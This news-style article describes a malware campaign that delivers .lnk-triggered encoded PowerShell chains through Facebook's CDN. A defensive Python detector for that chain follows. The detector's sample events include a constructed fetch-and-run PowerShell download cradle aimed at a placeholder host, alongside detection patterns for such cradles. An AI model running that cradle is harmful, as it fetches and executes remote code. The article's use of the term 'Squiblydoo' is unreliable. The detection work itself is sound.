Malware Group Uses Facebook CDN to Bypass Security Solutions

The previous attacks that used Google and Dropbox URLs were documented by Palo Alto’s Brad Duncan in a July write-up, and are almost identical to the ones detected last week by security researcher MalwareHunter.

The group uses Facebook’s CDN because the domain is trusted by most security solutions and there are low chances of having it blocked, compared to hosting malware on domains rarely active inside a business network.

Users who click on the link will download a RAR or ZIP file. These archives contain a link file (a Windows shortcut, .lnk).

If users click on the link file, the shortcut path invokes a legitimate application installed on most Windows PCs — such as Command Prompt or PowerShell — to run an encoded PowerShell script. This technique of using local applications to hide malicious operations is known as “Squiblydoo,” and its purpose is to bypass lower-end security software.

From this point on, the encoded PowerShell script downloads and runs another PowerShell script that kicks off a chain of further operations. The second PowerShell script downloads a loader DLL file, which in turn downloads a legitimate EXE file and a second DLL.
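The shortcut-to-encoded-PowerShell stage described above is the one a defender can see in process-creation telemetry. The following is an added example (not code from the article or the campaign it reports on) that decodes `-EncodedCommand` payloads and flags the combination of a shell spawned from a clicked shortcut with a download cradle; the sample events and the `example.invalid` URL are constructed for the demo, and the explorer.exe-as-parent heuristic is an assumption about how a double-clicked .lnk shows up in logs.

```python
import base64
import re

# Download cradles typical of the second-stage scripts the article describes.
CRADLE = re.compile(r"Net\.WebClient|Download(?:String|File)|Invoke-(?:WebRequest|Expression)|\bIEX\b", re.I)
SHELLS = ("powershell.exe", "pwsh.exe", "cmd.exe")

def is_encoded_flag(token):
    """True for -EncodedCommand or any prefix PowerShell accepts (-e, -enc, ...)."""
    t = token.lower().lstrip("-/")
    return len(t) < len(token) and t.startswith("e") and "encodedcommand".startswith(t)

def decode_encoded_command(cmdline):
    """Return the UTF-16LE script hidden behind -EncodedCommand, or None."""
    tokens = cmdline.split()
    for flag, value in zip(tokens, tokens[1:]):
        if is_encoded_flag(flag):
            try:
                return base64.b64decode(value, validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None

def classify(parent_image, image, cmdline):
    """Indicators that one process-creation event matches the shortcut -> shell -> encoded cradle chain."""
    reasons = []
    if image.lower().rsplit("\\", 1)[-1] not in SHELLS:
        return reasons
    if parent_image.lower().endswith("explorer.exe"):
        reasons.append("shell launched by explorer.exe, as when a .lnk is double-clicked (assumed heuristic)")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        reasons.append("encoded command")
        if CRADLE.search(decoded):
            reasons.append("download cradle in decoded script")
    elif CRADLE.search(cmdline):
        reasons.append("download cradle in command line")
    return reasons

def is_suspicious(parent_image, image, cmdline):
    """Alert on two or more indicators, so a plain cmd.exe opened from the desktop does not fire."""
    return len(classify(parent_image, image, cmdline)) >= 2

# Constructed sample events (parent, image, command line), not telemetry from the campaign.
ENCODED = base64.b64encode("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/2.ps1')".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    ("C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "powershell.exe -NoP -W Hidden -Enc " + ENCODED),
    ("C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\cmd.exe", "cmd.exe /c dir"),
    ("C:\\Windows\\System32\\svchost.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "powershell.exe -File C:\\scripts\\inventory.ps1"),
]
```

Running `classify` over the three sample events flags only the first; the bare cmd.exe from the desktop and the scheduled inventory script each carry at most one indicator.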
